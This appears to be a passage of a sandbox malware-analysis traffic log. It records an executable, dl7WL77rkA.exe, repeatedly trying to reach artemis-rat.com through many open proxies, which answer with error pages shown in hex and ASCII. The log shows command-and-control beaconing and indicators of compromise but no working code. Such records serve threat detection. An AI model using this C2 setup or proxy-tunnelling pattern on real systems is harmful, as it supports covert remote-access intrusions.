                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            286192.168.2.55058980.249.112.162803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.781188011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:17.978811979 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:19.006568909 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:20.226150990 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:22.846352100 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:27.713888884 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:37.442261934 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:56.893462896 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            287192.168.2.550758190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.791850090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            288192.168.2.550814104.16.108.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.792597055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.948542118 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            289192.168.2.550823104.17.171.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.795819998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.954982042 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            290192.168.2.55066637.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.796717882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            291192.168.2.550826104.17.166.210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.797494888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.955715895 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            292192.168.2.550053208.87.131.240413683876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.801661968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811242104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811671972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852344036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            293192.168.2.550677144.76.96.18055663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.803747892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.112215042 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            294192.168.2.55069894.23.220.136252563876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.805360079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.482949972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.436109066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389678001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202553034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092782974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
